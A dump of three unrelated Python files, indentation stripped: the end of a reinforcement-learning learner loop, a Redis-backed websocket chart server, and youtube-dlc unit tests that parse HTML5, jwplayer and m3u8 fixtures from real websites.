assert samples == batch_size * self.cfg.num_batches_per_iteration
self.env_steps += env_steps
experience_size = buffer.rewards.shape[0]
stats = dict(learner_env_steps=self.env_steps, policy_id=self.policy_id)
with timing.add_time('train'):
discarding_rate = self._discarding_rate()
self._update_pbt()
train_stats = self._train(buffer, batch_size, experience_size, timing)
if train_stats is not None:
stats['train'] = train_stats
if wait_stats is not None:
wait_avg, wait_min, wait_max = wait_stats
stats['train']['wait_avg'] = wait_avg
stats['train']['wait_min'] = wait_min
stats['train']['wait_max'] = wait_max
stats['train']['discarded_rollouts'] = self.num_discarded_rollouts
stats['train']['discarding_rate'] = discarding_rate
stats['stats'] = memory_stats('learner', self.device)
self.is_training = False
try:
safe_put(self.report_queue, stats, queue_name='report')
except Full:
log.warning('Could not report training stats, the report queue is full!')
def _train_loop(self):
timing = Timing()
self.initialize(timing)
wait_times = deque([], maxlen=self.cfg.num_workers)
last_cache_cleanup = time.time()
while not self.terminate:
with timing.timeit('train_wait'):
data = safe_get(self.experience_buffer_queue)
if self.terminate:
break
wait_stats = None
wait_times.append(timing.train_wait)
if len(wait_times) >= wait_times.maxlen:
wait_times_arr = np.asarray(wait_times)
wait_avg = np.mean(wait_times_arr)
wait_min, wait_max = wait_times_arr.min(), wait_times_arr.max()
# log.debug(
# 'Training thread had to wait %.5f s for the new experience buffer (avg %.5f)',
# timing.train_wait, wait_avg,
# )
wait_stats = (wait_avg, wait_min, wait_max)
self._process_training_data(data, timing, wait_stats)
self.num_batches_processed += 1
if time.time() - last_cache_cleanup > 300.0 or (not self.cfg.benchmark and self.num_batches_processed < 50):
if self.cfg.device == 'gpu':
torch.cuda.empty_cache()
torch.cuda.ipc_collect()
last_cache_cleanup = time.time()
time.sleep(0.3)
log.info('Train loop timing: %s', timing)
del self.actor_critic
del self.device
def _experience_collection_rate_stats(self):
now = time.time()
if now - self.discarded_experience_timer > 1.0:
self.discarded_experience_timer = now
self.discarded_experience_over_time.append((now, self.num_discarded_rollouts))
def _discarding_rate(self):
if len(self.discarded_experience_over_time) <= 1:
return 0
first, last = self.discarded_experience_over_time[0], self.discarded_experience_over_time[-1]
delta_rollouts = last[1] - first[1]
delta_time = last[0] - first[0]
discarding_rate = delta_rollouts / (delta_time + EPS)
return discarding_rate
def _extract_rollouts(self, data):
rollouts = []
for rollout_data in data:
tensors = self.rollout_tensors.index(rollout_data['traj_buffer_idx'])
rollout_data['t'] = tensors
rollouts.append(AttrDict(rollout_data))
return rollouts
def _process_pbt_task(self, pbt_task):
task_type, data = pbt_task
with self.pbt_mutex:
if task_type == PbtTask.SAVE_MODEL:
policy_id = data
assert policy_id == self.policy_id
self.should_save_model = True
elif task_type == PbtTask.LOAD_MODEL:
policy_id, new_policy_id = data
assert policy_id == self.policy_id
assert new_policy_id is not None
self.load_policy_id = new_policy_id
elif task_type == PbtTask.UPDATE_CFG:
policy_id, new_cfg = data
assert policy_id == self.policy_id
self.new_cfg = new_cfg
def _accumulated_too_much_experience(self, rollouts):
max_minibatches_to_accumulate = self.cfg.num_minibatches_to_accumulate
if max_minibatches_to_accumulate == -1:
# default value
max_minibatches_to_accumulate = 2 * self.cfg.num_batches_per_iteration
# allow the max batches to accumulate, plus the minibatches we're currently training on
max_minibatches_on_learner = max_minibatches_to_accumulate + self.cfg.num_batches_per_iteration
minibatches_currently_training = int(self.is_training) * self.cfg.num_batches_per_iteration
rollouts_per_minibatch = self.cfg.batch_size / self.cfg.rollout
# count contribution from unprocessed rollouts
minibatches_currently_accumulated = len(rollouts) / rollouts_per_minibatch
# count minibatches ready for training
minibatches_currently_accumulated += self.experience_buffer_queue.qsize() * self.cfg.num_batches_per_iteration
total_minibatches_on_learner = minibatches_currently_training + minibatches_currently_accumulated
return total_minibatches_on_learner >= max_minibatches_on_learner
def _run(self):
self.deferred_initialization()
log.info(f'LEARNER\tpid {os.getpid()}\tparent {os.getppid()}')
# workers should ignore Ctrl+C because the termination is handled in the event loop by a special msg
signal.signal(signal.SIGINT, signal.SIG_IGN)
try:
psutil.Process().nice(self.cfg.default_niceness)
except psutil.AccessDenied:
log.error('Low niceness requires sudo!')
if self.cfg.device == 'gpu':
cuda_envvars_for_policy(self.policy_id, 'learner')
torch.multiprocessing.set_sharing_strategy('file_system')
torch.set_num_threads(self.cfg.learner_main_loop_num_cores)
timing = Timing()
rollouts = []
if self.train_in_background:
self.training_thread.start()
else:
self.initialize(timing)
log.error(
'train_in_background set to False on learner %d! This is slow, use only for testing!', self.policy_id,
)
while not self.terminate:
while True:
try:
tasks = self.task_queue.get_many(timeout=0.005)
for task_type, data in tasks:
if task_type == TaskType.TRAIN:
with timing.add_time('extract'):
rollouts.extend(self._extract_rollouts(data))
# log.debug('Learner %d has %d rollouts', self.policy_id, len(rollouts))
elif task_type == TaskType.INIT:
self._init()
elif task_type == TaskType.TERMINATE:
time.sleep(0.3)
log.info('GPU learner timing: %s', timing)
self._terminate()
break
elif task_type == TaskType.PBT:
self._process_pbt_task(data)
except Empty:
break
if self._accumulated_too_much_experience(rollouts):
# if we accumulated too much experience, signal the policy workers to stop experience collection
if not self.stop_experience_collection[self.policy_id]:
self.stop_experience_collection_num_msgs += 1
# TODO: add a logger function for this
if self.stop_experience_collection_num_msgs >= 50:
log.info(
'Learner %d accumulated too much experience, stop experience collection! '
'Learner is likely a bottleneck in your experiment (%d times)',
self.policy_id, self.stop_experience_collection_num_msgs,
)
self.stop_experience_collection_num_msgs = 0
self.stop_experience_collection[self.policy_id] = True
elif self.stop_experience_collection[self.policy_id]:
# otherwise, resume the experience collection if it was stopped
self.stop_experience_collection[self.policy_id] = False
with self.resume_experience_collection_cv:
self.resume_experience_collection_num_msgs += 1
if self.resume_experience_collection_num_msgs >= 50:
log.debug('Learner %d is resuming experience collection!', self.policy_id)
self.resume_experience_collection_num_msgs = 0
self.resume_experience_collection_cv.notify_all()
with torch.no_grad():
rollouts = self._process_rollouts(rollouts, timing)
if not self.train_in_background:
while not self.experience_buffer_queue.empty():
training_data = self.experience_buffer_queue.get()
self._process_training_data(training_data, timing)
self._experience_collection_rate_stats()
if self.train_in_background:
self.experience_buffer_queue.put(None)
self.training_thread.join()
def init(self):
self.task_queue.put((TaskType.INIT, None))
self.initialized_event.wait()
def save_model(self, timeout=None):
self.model_saved_event.clear()
save_task = (PbtTask.SAVE_MODEL, self.policy_id)
self.task_queue.put((TaskType.PBT, save_task))
log.debug('Wait while learner %d saves the model...', self.policy_id)
if self.model_saved_event.wait(timeout=timeout):
log.debug('Learner %d saved the model!', self.policy_id)
else:
log.warning('Model saving request timed out!')
self.model_saved_event.clear()
def close(self):
self.task_queue.put((TaskType.TERMINATE, None))
self.shared_buffers._stop_experience_collection[self.policy_id] = False
def join(self):
join_or_kill(self.process)
|
main.py
|
#coding:utf8
import sys
import config
from ws_server import WebSocketServer
import log
from ws_server import WebSocketMsgHandler
from pubsub import SubscribeManager
from pubsub import Publisher
import signal
import json
from charts import ChartAgent
from datasets import DBChartAgent
from threading import Thread
import time
import datasets
class DvClinetDispatcher(WebSocketMsgHandler):
def __init__(self, sub, dbc):
self.sub = sub
self.dbc = dbc
self.on_close_cb = set()
WebSocketMsgHandler.__init__(self)
def on_client_open(self, client):
WebSocketMsgHandler.on_client_open(self, client)
log.debug('open')
def handle_charts(self, data):
#{u'chart_id': u'chart', u'chart_name': u'online', u'mode': u'static', limit:20, server:'2003'}
chart_name = data['chart_name']
limit = data['limit']
server = data['server']
linestyle = data['line'];
channel = chart_name
latest = self.dbc.getLatestISK(channel, server, limit)
ca = ChartAgent(self, data['chart_id'], chart_name, linestyle)
if data['mode'] == 'static':
ca.render(channel, channel, latest)
pass
else:
#dynamic data
ca.render(channel, channel, latest)
current_value = list(latest[-1]) #time,ival,sval
def on_recv_channel_msg(data):
if server != data['server']:
return
current_value[0] = data['time']
if data['op'] == 'inc':
current_value[1] = current_value[1] + data['value']
else:
current_value[1] = current_value[1] - data['value']
ca.update(current_value)
pass
self.sub.subscribe(channel, on_recv_channel_msg)
def on_close():
self.sub.unsubscribe(channel, on_recv_channel_msg)
self.on_close_cb.add(on_close)
pass
def on_client_message(self, jobj):
if jobj['type'] == 'charts':
self.handle_charts(jobj['data'])
def on_client_close(self):
log.debug('close')
for ocb in self.on_close_cb:
ocb()
self.on_close_cb.clear()
#unsubscribe
def main():
log.init_logger(config.LOG_FILE)
log.set_level(config.LOG_LEVEL)
sub = SubscribeManager(config.REDIS_MQ_HOST,config.REDIS_MQ_PORT,config.REDIS_MQ_DB)
dbc = DBChartAgent(config.DB_HOST, config.DB_PORT, config.DB_USER, config.DB_PASSWD, config.DB_NAME)
wss = WebSocketServer(config.WSS_URI, DvClinetDispatcher(sub, dbc), host=config.WSS_HOST, port=config.WSS_PORT)
def test_push_online():
dbc.createKey("online")
pub = Publisher(config.REDIS_MQ_HOST, config.REDIS_MQ_PORT, config.REDIS_MQ_DB)
import random
while True:
add = random.randint(-100,100);
dbc.incKey("online","2003", add)
pub.publish('online', {'server':'2003', "op":"inc", "value":add, "time": datasets.current_ms()})
time.sleep(1)
tester = Thread(target=test_push_online)
tester.setDaemon(True)
wss.setDaemon(True)
wss.start()
tester.start()
exit_main = False
def stop():
log.info("stop the io thread ...")
exit_main=True
#wss.stop()
#tester.stop()
signal.signal(signal.SIGQUIT, stop)
while not exit_main:
sub.poll()
wss.join()
tester.join()
if __name__ == '__main__':
main()
|
test_InfoExtractor.py
|
#!/usr/bin/env python
from __future__ import unicode_literals
# Allow direct execution
import io
import os
import sys
import unittest
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from test.helper import FakeYDL, expect_dict, expect_value, http_server_port
from youtube_dlc.compat import compat_etree_fromstring, compat_http_server
from youtube_dlc.extractor.common import InfoExtractor
from youtube_dlc.extractor import YoutubeIE, get_info_extractor
from youtube_dlc.utils import encode_data_uri, strip_jsonp, ExtractorError, RegexNotFoundError
import threading
TEAPOT_RESPONSE_STATUS = 418
TEAPOT_RESPONSE_BODY = "<h1>418 I'm a teapot</h1>"
class InfoExtractorTestRequestHandler(compat_http_server.BaseHTTPRequestHandler):
def log_message(self, format, *args):
pass
def do_GET(self):
if self.path == '/teapot':
self.send_response(TEAPOT_RESPONSE_STATUS)
self.send_header('Content-Type', 'text/html; charset=utf-8')
self.end_headers()
self.wfile.write(TEAPOT_RESPONSE_BODY.encode())
else:
assert False
class TestIE(InfoExtractor):
pass
class TestInfoExtractor(unittest.TestCase):
def setUp(self):
self.ie = TestIE(FakeYDL())
def test_ie_key(self):
self.assertEqual(get_info_extractor(YoutubeIE.ie_key()), YoutubeIE)
def test_html_search_regex(self):
html = '<p id="foo">Watch this <a href="http://www.youtube.com/watch?v=BaW_jenozKc">video</a></p>'
search = lambda re, *args: self.ie._html_search_regex(re, html, *args)
self.assertEqual(search(r'<p id="foo">(.+?)</p>', 'foo'), 'Watch this video')
def test_opengraph(self):
ie = self.ie
html = '''
<meta name="og:title" content='Foo'/>
<meta content="Some video's description " name="og:description"/>
<meta property='og:image' content='http://domain.com/pic.jpg?key1=val1&key2=val2'/>
<meta content='application/x-shockwave-flash' property='og:video:type'>
<meta content='Foo' property=og:foobar>
<meta name="og:test1" content='foo > < bar'/>
<meta name="og:test2" content="foo >//< bar"/>
<meta property=og-test3 content='Ill-formatted opengraph'/>
'''
self.assertEqual(ie._og_search_title(html), 'Foo')
self.assertEqual(ie._og_search_description(html), 'Some video\'s description ')
self.assertEqual(ie._og_search_thumbnail(html), 'http://domain.com/pic.jpg?key1=val1&key2=val2')
self.assertEqual(ie._og_search_video_url(html, default=None), None)
self.assertEqual(ie._og_search_property('foobar', html), 'Foo')
self.assertEqual(ie._og_search_property('test1', html), 'foo > < bar')
self.assertEqual(ie._og_search_property('test2', html), 'foo >//< bar')
self.assertEqual(ie._og_search_property('test3', html), 'Ill-formatted opengraph')
self.assertEqual(ie._og_search_property(('test0', 'test1'), html), 'foo > < bar')
self.assertRaises(RegexNotFoundError, ie._og_search_property, 'test0', html, None, fatal=True)
self.assertRaises(RegexNotFoundError, ie._og_search_property, ('test0', 'test00'), html, None, fatal=True)
def test_html_search_meta(self):
ie = self.ie
html = '''
<meta name="a" content="1" />
<meta name='b' content='2'>
<meta name="c" content='3'>
<meta name=d content='4'>
<meta property="e" content='5' >
<meta content="6" name="f">
'''
self.assertEqual(ie._html_search_meta('a', html), '1')
self.assertEqual(ie._html_search_meta('b', html), '2')
self.assertEqual(ie._html_search_meta('c', html), '3')
self.assertEqual(ie._html_search_meta('d', html), '4')
self.assertEqual(ie._html_search_meta('e', html), '5')
self.assertEqual(ie._html_search_meta('f', html), '6')
self.assertEqual(ie._html_search_meta(('a', 'b', 'c'), html), '1')
self.assertEqual(ie._html_search_meta(('c', 'b', 'a'), html), '3')
self.assertEqual(ie._html_search_meta(('z', 'x', 'c'), html), '3')
self.assertRaises(RegexNotFoundError, ie._html_search_meta, 'z', html, None, fatal=True)
self.assertRaises(RegexNotFoundError, ie._html_search_meta, ('z', 'x'), html, None, fatal=True)
def test_download_json(self):
uri = encode_data_uri(b'{"foo": "blah"}', 'application/json')
self.assertEqual(self.ie._download_json(uri, None), {'foo': 'blah'})
uri = encode_data_uri(b'callback({"foo": "blah"})', 'application/javascript')
self.assertEqual(self.ie._download_json(uri, None, transform_source=strip_jsonp), {'foo': 'blah'})
uri = encode_data_uri(b'{"foo": invalid}', 'application/json')
self.assertRaises(ExtractorError, self.ie._download_json, uri, None)
self.assertEqual(self.ie._download_json(uri, None, fatal=False), None)
def test_parse_html5_media_entries(self):
# from https://www.r18.com/
# with kpbs in label
expect_dict(
self,
self.ie._parse_html5_media_entries(
'https://www.r18.com/',
r'''
<video id="samplevideo_amateur" class="js-samplevideo video-js vjs-default-skin vjs-big-play-centered" controls preload="auto" width="400" height="225" poster="//pics.r18.com/digital/amateur/mgmr105/mgmr105jp.jpg">
<source id="video_source" src="https://awscc3001.r18.com/litevideo/freepv/m/mgm/mgmr105/mgmr105_sm_w.mp4" type="video/mp4" res="240" label="300kbps">
<source id="video_source" src="https://awscc3001.r18.com/litevideo/freepv/m/mgm/mgmr105/mgmr105_dm_w.mp4" type="video/mp4" res="480" label="1000kbps">
<source id="video_source" src="https://awscc3001.r18.com/litevideo/freepv/m/mgm/mgmr105/mgmr105_dmb_w.mp4" type="video/mp4" res="740" label="1500kbps">
<p>Your browser does not support the video tag.</p>
</video>
''', None)[0],
{
'formats': [{
'url': 'https://awscc3001.r18.com/litevideo/freepv/m/mgm/mgmr105/mgmr105_sm_w.mp4',
'ext': 'mp4',
'format_id': '300kbps',
'height': 240,
'tbr': 300,
}, {
'url': 'https://awscc3001.r18.com/litevideo/freepv/m/mgm/mgmr105/mgmr105_dm_w.mp4',
'ext': 'mp4',
'format_id': '1000kbps',
'height': 480,
'tbr': 1000,
}, {
'url': 'https://awscc3001.r18.com/litevideo/freepv/m/mgm/mgmr105/mgmr105_dmb_w.mp4',
'ext': 'mp4',
'format_id': '1500kbps',
'height': 740,
'tbr': 1500,
}],
'thumbnail': '//pics.r18.com/digital/amateur/mgmr105/mgmr105jp.jpg'
})
# from https://www.csfd.cz/
# with width and height
expect_dict(
self,
self.ie._parse_html5_media_entries(
'https://www.csfd.cz/',
r'''
<video width="770" height="328" preload="none" controls poster="https://img.csfd.cz/files/images/film/video/preview/163/344/163344118_748d20.png?h360" >
<source src="https://video.csfd.cz/files/videos/157/750/157750813/163327358_eac647.mp4" type="video/mp4" width="640" height="360">
<source src="https://video.csfd.cz/files/videos/157/750/157750813/163327360_3d2646.mp4" type="video/mp4" width="1280" height="720">
<source src="https://video.csfd.cz/files/videos/157/750/157750813/163327356_91f258.mp4" type="video/mp4" width="1920" height="1080">
<source src="https://video.csfd.cz/files/videos/157/750/157750813/163327359_962b4a.webm" type="video/webm" width="640" height="360">
<source src="https://video.csfd.cz/files/videos/157/750/157750813/163327361_6feee0.webm" type="video/webm" width="1280" height="720">
<source src="https://video.csfd.cz/files/videos/157/750/157750813/163327357_8ab472.webm" type="video/webm" width="1920" height="1080">
<track src="https://video.csfd.cz/files/subtitles/163/344/163344115_4c388b.srt" type="text/x-srt" kind="subtitles" srclang="cs" label="cs">
</video>
''', None)[0],
{
'formats': [{
'url': 'https://video.csfd.cz/files/videos/157/750/157750813/163327358_eac647.mp4',
'ext': 'mp4',
'width': 640,
'height': 360,
}, {
'url': 'https://video.csfd.cz/files/videos/157/750/157750813/163327360_3d2646.mp4',
'ext': 'mp4',
'width': 1280,
'height': 720,
}, {
'url': 'https://video.csfd.cz/files/videos/157/750/157750813/163327356_91f258.mp4',
'ext': 'mp4',
'width': 1920,
'height': 1080,
}, {
'url': 'https://video.csfd.cz/files/videos/157/750/157750813/163327359_962b4a.webm',
'ext': 'webm',
'width': 640,
'height': 360,
}, {
'url': 'https://video.csfd.cz/files/videos/157/750/157750813/163327361_6feee0.webm',
'ext': 'webm',
'width': 1280,
'height': 720,
}, {
'url': 'https://video.csfd.cz/files/videos/157/750/157750813/163327357_8ab472.webm',
'ext': 'webm',
'width': 1920,
'height': 1080,
}],
'subtitles': {
'cs': [{'url': 'https://video.csfd.cz/files/subtitles/163/344/163344115_4c388b.srt'}]
},
'thumbnail': 'https://img.csfd.cz/files/images/film/video/preview/163/344/163344118_748d20.png?h360'
})
# from https://tamasha.com/v/Kkdjw
# with height in label
expect_dict(
self,
self.ie._parse_html5_media_entries(
'https://tamasha.com/v/Kkdjw',
r'''
<video crossorigin="anonymous">
<source src="https://s-v2.tamasha.com/statics/videos_file/19/8f/Kkdjw_198feff8577d0057536e905cce1fb61438dd64e0_n_240.mp4" type="video/mp4" label="AUTO" res="0"/>
<source src="https://s-v2.tamasha.com/statics/videos_file/19/8f/Kkdjw_198feff8577d0057536e905cce1fb61438dd64e0_n_240.mp4" type="video/mp4"
label="240p" res="240"/>
<source src="https://s-v2.tamasha.com/statics/videos_file/20/00/Kkdjw_200041c66f657fc967db464d156eafbc1ed9fe6f_n_144.mp4" type="video/mp4"
label="144p" res="144"/>
</video>
''', None)[0],
{
'formats': [{
'url': 'https://s-v2.tamasha.com/statics/videos_file/19/8f/Kkdjw_198feff8577d0057536e905cce1fb61438dd64e0_n_240.mp4',
}, {
'url': 'https://s-v2.tamasha.com/statics/videos_file/19/8f/Kkdjw_198feff8577d0057536e905cce1fb61438dd64e0_n_240.mp4',
'ext': 'mp4',
'format_id': '240p',
'height': 240,
}, {
'url': 'https://s-v2.tamasha.com/statics/videos_file/20/00/Kkdjw_200041c66f657fc967db464d156eafbc1ed9fe6f_n_144.mp4',
'ext': 'mp4',
'format_id': '144p',
'height': 144,
}]
})
# from https://www.directvnow.com
# with data-src
expect_dict(
self,
self.ie._parse_html5_media_entries(
'https://www.directvnow.com',
r'''
<video id="vid1" class="header--video-masked active" muted playsinline>
<source data-src="https://cdn.directv.com/content/dam/dtv/prod/website_directvnow-international/videos/DTVN_hdr_HBO_v3.mp4" type="video/mp4" />
</video>
''', None)[0],
{
'formats': [{
'ext': 'mp4',
'url': 'https://cdn.directv.com/content/dam/dtv/prod/website_directvnow-international/videos/DTVN_hdr_HBO_v3.mp4',
}]
})
# from https://www.directvnow.com
# with data-src
expect_dict(
self,
self.ie._parse_html5_media_entries(
'https://www.directvnow.com',
r'''
<video id="vid1" class="header--video-masked active" muted playsinline>
<source data-src="https://cdn.directv.com/content/dam/dtv/prod/website_directvnow-international/videos/DTVN_hdr_HBO_v3.mp4" type="video/mp4" />
</video>
''', None)[0],
{
'formats': [{
'url': 'https://cdn.directv.com/content/dam/dtv/prod/website_directvnow-international/videos/DTVN_hdr_HBO_v3.mp4',
'ext': 'mp4',
}]
})
# from https://www.klarna.com/uk/
# with data-video-src
expect_dict(
self,
self.ie._parse_html5_media_entries(
'https://www.directvnow.com',
r'''
<video loop autoplay muted class="responsive-video block-kl__video video-on-medium">
<source src="" data-video-desktop data-video-src="https://www.klarna.com/uk/wp-content/uploads/sites/11/2019/01/KL062_Smooth3_0_DogWalking_5s_920x080_.mp4" type="video/mp4" />
</video>
''', None)[0],
{
'formats': [{
'url': 'https://www.klarna.com/uk/wp-content/uploads/sites/11/2019/01/KL062_Smooth3_0_DogWalking_5s_920x080_.mp4',
'ext': 'mp4',
}],
})
def test_extract_jwplayer_data_realworld(self):
# from http://www.suffolk.edu/sjc/
expect_dict(
self,
self.ie._extract_jwplayer_data(r'''
<script type='text/javascript'>
jwplayer('my-video').setup({
file: 'rtmp://192.138.214.154/live/sjclive',
fallback: 'true',
width: '95%',
aspectratio: '16:9',
primary: 'flash',
mediaid:'XEgvuql4'
});
</script>
''', None, require_title=False),
{
'id': 'XEgvuql4',
'formats': [{
'url': 'rtmp://192.138.214.154/live/sjclive',
'ext': 'flv'
}]
})
# from https://www.pornoxo.com/videos/7564/striptease-from-sexy-secretary/
expect_dict(
self,
self.ie._extract_jwplayer_data(r'''
<script type="text/javascript">
jwplayer("mediaplayer").setup({
'videoid': "7564",
'width': "100%",
'aspectratio': "16:9",
'stretching': "exactfit",
'autostart': 'false',
'flashplayer': "https://t04.vipstreamservice.com/jwplayer/v5.10/player.swf",
'file': "https://cdn.pornoxo.com/key=MF+oEbaxqTKb50P-w9G3nA,end=1489689259,ip=104.199.146.27/ip=104.199.146.27/speed=6573765/buffer=3.0/2009-12/4b2157147afe5efa93ce1978e0265289c193874e02597.flv",
'image': "https://t03.vipstreamservice.com/thumbs/pxo-full/2009-12/14/a4b2157147afe5efa93ce1978e0265289c193874e02597.flv-full-13.jpg",
'filefallback': "https://cdn.pornoxo.com/key=9ZPsTR5EvPLQrBaak2MUGA,end=1489689259,ip=104.199.146.27/ip=104.199.146.27/speed=6573765/buffer=3.0/2009-12/m_4b2157147afe5efa93ce1978e0265289c193874e02597.mp4",
'logo.hide': true,
'skin': "https://t04.vipstreamservice.com/jwplayer/skin/modieus-blk.zip",
'plugins': "https://t04.vipstreamservice.com/jwplayer/dock/dockableskinnableplugin.swf",
'dockableskinnableplugin.piclink': "/index.php?key=ajax-videothumbsn&vid=7564&data=2009-12--14--4b2157147afe5efa93ce1978e0265289c193874e02597.flv--17370",
'controlbar': 'bottom',
'modes': [
{type: 'flash', src: 'https://t04.vipstreamservice.com/jwplayer/v5.10/player.swf'}
],
'provider': 'http'
});
//noinspection JSAnnotator
invideo.setup({
adsUrl: "/banner-iframe/?zoneId=32",
adsUrl2: "",
autostart: false
});
</script>
''', 'dummy', require_title=False),
{
'thumbnail': 'https://t03.vipstreamservice.com/thumbs/pxo-full/2009-12/14/a4b2157147afe5efa93ce1978e0265289c193874e02597.flv-full-13.jpg',
'formats': [{
'url': 'https://cdn.pornoxo.com/key=MF+oEbaxqTKb50P-w9G3nA,end=1489689259,ip=104.199.146.27/ip=104.199.146.27/speed=6573765/buffer=3.0/2009-12/4b2157147afe5efa93ce1978e0265289c193874e02597.flv',
'ext': 'flv'
}]
})
# from http://www.indiedb.com/games/king-machine/videos
expect_dict(
self,
self.ie._extract_jwplayer_data(r'''
<script>
jwplayer("mediaplayer").setup({"abouttext":"Visit Indie DB","aboutlink":"http:\/\/www.indiedb.com\/","displaytitle":false,"autostart":false,"repeat":false,"title":"king machine trailer 1","sharing":{"link":"http:\/\/www.indiedb.com\/games\/king-machine\/videos\/king-machine-trailer-1","code":"<iframe width=\"560\" height=\"315\" src=\"http:\/\/www.indiedb.com\/media\/iframe\/1522983\" frameborder=\"0\" allowfullscreen><\/iframe><br><a href=\"http:\/\/www.indiedb.com\/games\/king-machine\/videos\/king-machine-trailer-1\">king machine trailer 1 - Indie DB<\/a>"},"related":{"file":"http:\/\/rss.indiedb.com\/media\/recommended\/1522983\/feed\/rss.xml","dimensions":"160x120","onclick":"link"},"sources":[{"file":"http:\/\/cdn.dbolical.com\/cache\/videos\/games\/1\/50\/49678\/encode_mp4\/king-machine-trailer.mp4","label":"360p SD","default":"true"},{"file":"http:\/\/cdn.dbolical.com\/cache\/videos\/games\/1\/50\/49678\/encode720p_mp4\/king-machine-trailer.mp4","label":"720p HD"}],"image":"http:\/\/media.indiedb.com\/cache\/images\/games\/1\/50\/49678\/thumb_620x2000\/king-machine-trailer.mp4.jpg","advertising":{"client":"vast","tag":"http:\/\/ads.intergi.com\/adrawdata\/3.0\/5205\/4251742\/0\/1013\/ADTECH;cors=yes;width=560;height=315;referring_url=http:\/\/www.indiedb.com\/games\/king-machine\/videos\/king-machine-trailer-1;content_url=http:\/\/www.indiedb.com\/games\/king-machine\/videos\/king-machine-trailer-1;media_id=1522983;title=king+machine+trailer+1;device=__DEVICE__;model=__MODEL__;os=Windows+OS;osversion=__OSVERSION__;ua=__UA__;ip=109.171.17.81;uniqueid=1522983;tags=__TAGS__;number=58cac25928151;time=1489683033"},"width":620,"height":349}).once("play", function(event) {
videoAnalytics("play");
}).once("complete", function(event) {
videoAnalytics("completed");
});
</script>
''', 'dummy'),
{
'title': 'king machine trailer 1',
'thumbnail': 'http://media.indiedb.com/cache/images/games/1/50/49678/thumb_620x2000/king-machine-trailer.mp4.jpg',
'formats': [{
'url': 'http://cdn.dbolical.com/cache/videos/games/1/50/49678/encode_mp4/king-machine-trailer.mp4',
'height': 360,
'ext': 'mp4'
}, {
'url': 'http://cdn.dbolical.com/cache/videos/games/1/50/49678/encode720p_mp4/king-machine-trailer.mp4',
'height': 720,
'ext': 'mp4'
}]
})
def test_parse_m3u8_formats(self):
_TEST_CASES = [
(
# https://github.com/ytdl-org/youtube-dl/issues/11507
# http://pluzz.francetv.fr/videos/le_ministere.html
'pluzz_francetv_11507',
'http://replayftv-vh.akamaihd.net/i/streaming-adaptatif_france-dom-tom/2017/S16/J2/156589847-58f59130c1f52-,standard1,standard2,standard3,standard4,standard5,.mp4.csmil/master.m3u8?caption=2017%2F16%2F156589847-1492488987.m3u8%3Afra%3AFrancais&audiotrack=0%3Afra%3AFrancais',
[{
'url': 'http://replayftv-vh.akamaihd.net/i/streaming-adaptatif_france-dom-tom/2017/S16/J2/156589847-58f59130c1f52-,standard1,standard2,standard3,standard4,standard5,.mp4.csmil/index_0_av.m3u8?null=0',
'manifest_url': 'http://replayftv-vh.akamaihd.net/i/streaming-adaptatif_france-dom-tom/2017/S16/J2/156589847-58f59130c1f52-,standard1,standard2,standard3,standard4,standard5,.mp4.csmil/master.m3u8?caption=2017%2F16%2F156589847-1492488987.m3u8%3Afra%3AFrancais&audiotrack=0%3Afra%3AFrancais',
'ext': 'mp4',
'format_id': '180',
'protocol': 'm3u8',
'acodec': 'mp4a.40.2',
'vcodec': 'avc1.66.30',
'tbr': 180,
'width': 256,
'height': 144,
}, {
'url': 'http://replayftv-vh.akamaihd.net/i/streaming-adaptatif_france-dom-tom/2017/S16/J2/156589847-58f59130c1f52-,standard1,standard2,standard3,standard4,standard5,.mp4.csmil/index_1_av.m3u8?null=0',
'manifest_url': 'http://replayftv-vh.akamaihd.net/i/streaming-adaptatif_france-dom-tom/2017/S16/J2/156589847-58f59130c1f52-,standard1,standard2,standard3,standard4,standard5,.mp4.csmil/master.m3u8?caption=2017%2F16%2F156589847-1492488987.m3u8%3Afra%3AFrancais&audiotrack=0%3Afra%3AFrancais',
'ext': 'mp4',
'format_id': '303',
'protocol': 'm3u8',
'acodec': 'mp4a.40.2',
'vcodec': 'avc1.66.30',
'tbr': 303,
'width': 320,
'height': 180,
}, {
'url': 'http://replayftv-vh.akamaihd.net/i/streaming-adaptatif_france-dom-tom/2017/S16/J2/156589847-58f59130c1f52-,standard1,standard2,standard3,standard4,standard5,.mp4.csmil/index_2_av.m3u8?null=0',
'manifest_url': 'http://replayftv-vh.akamaihd.net/i/streaming-adaptatif_france-dom-tom/2017/S16/J2/156589847-58f59130c1f52-,standard1,standard2,standard3,standard4,standard5,.mp4.csmil/master.m3u8?caption=2017%2F16%2F156589847-1492488987.m3u8%3Afra%3AFrancais&audiotrack=0%3Afra%3AFrancais',
'ext': 'mp4',
'format_id': '575',
'protocol': 'm3u8',
'acodec': 'mp4a.40.2',
'vcodec': 'avc1.66.30',
'tbr': 575,
'width': 512,
'height': 288,
}, {
'url': 'http://replayftv-vh.akamaihd.net/i/streaming-adaptatif_france-dom-tom/2017/S16/J2/156589847-58f59130c1f52-,standard1,standard2,standard3,standard4,standard5,.mp4.csmil/index_3_av.m3u8?null=0',
'manifest_url': 'http://replayftv-vh.akamaihd.net/i/streaming-adaptatif_france-dom-tom/2017/S16/J2/156589847-58f59130c1f52-,standard1,standard2,standard3,standard4,standard5,.mp4.csmil/master.m3u8?caption=2017%2F16%2F156589847-1492488987.m3u8%3Afra%3AFrancais&audiotrack=0%3Afra%3AFrancais',
'ext': 'mp4',
'format_id': '831',
'protocol': 'm3u8',
'acodec': 'mp4a.40.2',
'vcodec': 'avc1.77.30',
'tbr': 831,
'width': 704,
'height': 396,
}, {
'url': 'http://replayftv-vh.akamaihd.net/i/streaming-adaptatif_france-dom-tom/2017/S16/J2/156589847-58f59130c1f52-,standard1,standard2,standard3,standard4,standard5,.mp4.csmil/index_4_av.m3u8?null=0',
'manifest_url': 'http://replayftv-vh.akamaihd.net/i/streaming-adaptatif_france-dom-tom/2017/S16/J2/156589847-58f59130c1f52-,standard1,standard2,standard3,standard4,standard5,.mp4.csmil/master.m3u8?caption=2017%2F16%2F156589847-1492488987.m3u8%3Afra%3AFrancais&audiotrack=0%3Afra%3AFrancais',
'ext': 'mp4',
'protocol': 'm3u8',
'format_id': '1467',
'acodec': 'mp4a.40.2',
'vcodec': 'avc1.77.30',
'tbr': 1467,
'width': 1024,
'height': 576,
}]
),
(
# https://github.com/ytdl-org/youtube-dl/issues/11995
# http://teamcoco.com/video/clueless-gamer-super-bowl-for-honor
'teamcoco_11995',
'http://ak.storage-w.teamcococdn.com/cdn/2017-02/98599/ed8f/main.m3u8',
